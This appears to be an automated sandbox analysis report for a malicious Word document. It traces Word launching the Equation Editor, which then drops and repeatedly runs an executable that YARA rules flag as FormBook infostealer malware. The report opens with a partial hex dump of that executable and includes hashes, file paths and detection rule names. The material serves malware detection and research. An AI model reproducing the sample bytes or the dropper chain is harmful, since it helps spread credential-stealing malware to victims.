                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0f 9e f8 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 9c 08 00 00 2c 01 00 00 00 00 00 96 bb 08 00 00 20 00 00 00 c0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c bb 08 00 57 00 00 00 00 c0 08 00 18 28 01 00 00 00 00 00 00 00 00 00 00 ca 09 00 d0 1c 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 9b 08 00 00 20 00 00 00 9c 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 18 28 01 00 00 c0 08 00 00 2a 01 00 00 9e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 c8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 bb 08 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 9f 08 00 a0 1b 00 00 03 00 00 00 20 00 00 06 98 31 00 00 04 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 18 18 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 14 00 00 0a 74 02 00 00 02 1a 2d 03 26 2b 07 
80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 09 00 25 00 00 00 00 00 00 00 02 28 15 00 00 0a 02 03 16 2c 0b 26 26 02 04 15 2d 0b 26 26 2b 0e 7d 02 00 00 04 2b f0 7d 03 00 00 04 2b 00 2a 00 00 00 03 30 04 00 5c 00 00 00 00 00 00 00 02 28 15 00 00 0a 20 f0 55 00 00 1c 2d 1b 26 02 73 16 00 00 0a 1d 2d 18 26 26 28 17 00 00 0a 7e 06 00 00 04 25 2d 2f 2b 0e 28 18 00 00 0a 2b df 7d 04 00 00 04 2b e3 26 7e 05 00 00 04 fe 06 0d 00 00 06 73 19 00 00 0a 25 1c 2d 03 26 2b 07 80 06 00 00 04 2b 00 6f 1a 00 00 0a 2a 13 30 03 00 29 00 00 00 01 00 00 11 03 04 73 04 00 00 06 16 2c 0c 26 02 03 28 0a 00 00 06 2d 13 2b 03 0a 2b f2 02 7b 04 00 00 04 06 6f 1b 00 00 0a 17 2a 16 2a 00 00 00 13 30 03 00 24 00 00 00 01 00 00 11 02 03 28 0a 00 00 06 17 2d 06 26 06 2c 14 2b 03 0a 2b f8 02 7b 04 00 00 04 06 6f 1c 00 00 0a 26 17 2a 16 2a 03 30 0a 00 1f 00 00 00 00 00 00 00 02 19 19 2d 13 26 7b 04 00 00 04 03 18 15 2d 0b 26 6f 1d 00 00 0a 2b 06 26 2b eb 26 2b f3 2a 00 03 30 0a 00 19 00 00 00 00 00 00 00 02 19 15 2d 10 26 7b 04 00 00 04 6f 1e 00 00 0a 16 fe 01 2b 03 26 2b ee 2a 00 00 00 13 30 04 00 34 00 00 00 02 00 00 11 73 0e 00 00 06 16 2c 21 26 06 03 19 2d 1e 26 26 02 7b 04 00 00 04 06 fe 06 0f 00 00 06 73 1f 00 00 0a 6f 20 00 00 0a 2b 0a 0a 2b dd 7d 07 00 00 04 2b dd 2a 03 30 09
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`, @ @<W( H.text `.rsrc(*@@.reloc@BxH 1n0-&(+&+*0s(t-&++*~*0%(,&&-&&+}+}+*0\( U-&s-&&(~%-/+(+}+&~s%-&++o*0)s,&(-++{o**0$(-&,++{o&**0-&{-&o+&+&+*0-&{o+&+*04s,!&-&&{so ++}+*0


                  Code Manipulations

                  Statistics

                  Behavior

                  System Behavior

                  General

                  Start time: 14:14:34
                  Start date: 22/07/2021
                  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  Wow64 process (32bit): false
                  Commandline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                  Imagebase: 0x13f3c0000
                  File size: 1424032 bytes
                  MD5 hash: 95C38D04597050285A18F66039EDB456
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  General

                  Start time: 14:14:35
                  Start date: 22/07/2021
                  Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit): true
                  Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Imagebase: 0x400000
                  File size: 543304 bytes
                  MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high

                  General

                  Start time: 14:14:36
                  Start date: 22/07/2021
                  Path: C:\Users\user\AppData\Roaming\princedan859323.exe
                  Wow64 process (32bit): true
                  Commandline: C:\Users\user\AppData\Roaming\princedan859323.exe
                  Imagebase: 0x8f0000
                  File size: 648912 bytes
                  MD5 hash: 0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: .Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2178390571.0000000003520000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000003.2166132722.0000000003562000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2178206490.0000000003399000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Antivirus matches:
                  • Detection: 24%, ReversingLabs
                  Reputation: low

                  General

                  Start time: 14:15:18
                  Start date: 22/07/2021
                  Path: C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase: 0x3e0000
                  File size: 648912 bytes
                  MD5 hash: 0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Antivirus matches:
                  • Detection: 24%, ReversingLabs
                  Reputation: low

                  General

                  Start time: 14:15:18
                  Start date: 22/07/2021
                  Path: C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase: 0x3e0000
                  File size: 648912 bytes
                  MD5 hash: 0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: low

                  General

                  Start time: 14:15:19
                  Start date: 22/07/2021
                  Path: C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase: 0x3e0000
                  File size: 648912 bytes
                  MD5 hash: 0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: low

                  General

                  Start time: 14:15:19
                  Start date: 22/07/2021
                  Path: C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase: 0x3e0000
                  File size: 648912 bytes
                  MD5 hash: 0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: low

                  General

                  Start time: 14:15:20
                  Start date: 22/07/2021
                  Path: C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase: 0x3e0000
                  File size: 648912 bytes
                  MD5 hash: 0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: low

                  General

                  Start time: 14:15:20
                  Start date: 22/07/2021
                  Path: C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase: 0x3e0000
                  File size: 648912 bytes
                  MD5 hash: 0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: low

                  General

                  Start time: 14:15:21
                  Start date: 22/07/2021
                  Path: C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase: 0x3e0000
                  File size: 648912 bytes
                  MD5 hash: 0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: low

                  General

                  Start time: 14:15:21
                  Start date: 22/07/2021
                  Path: C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase: 0x3e0000
                  File size: 648912 bytes
                  MD5 hash: 0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language

                  General

                  Start time: 14:15:22
                  Start date: 22/07/2021
                  Path: C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase: 0x3e0000
                  File size: 648912 bytes
                  MD5 hash: 0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language

                  General

                  Start time: 14:15:22
                  Start date: 22/07/2021
                  Path: C:\Users\user\AppData\Local\Temp\princedan859323.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Users\user\AppData\Local\Temp\princedan859323.exe vgyjnbhui
                  Imagebase: 0x3e0000
                  File size: 648912 bytes
                  MD5 hash: 0E715DB2198FF670F4BF0E88E0E9B547
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language

                  Disassembly

                  Code Analysis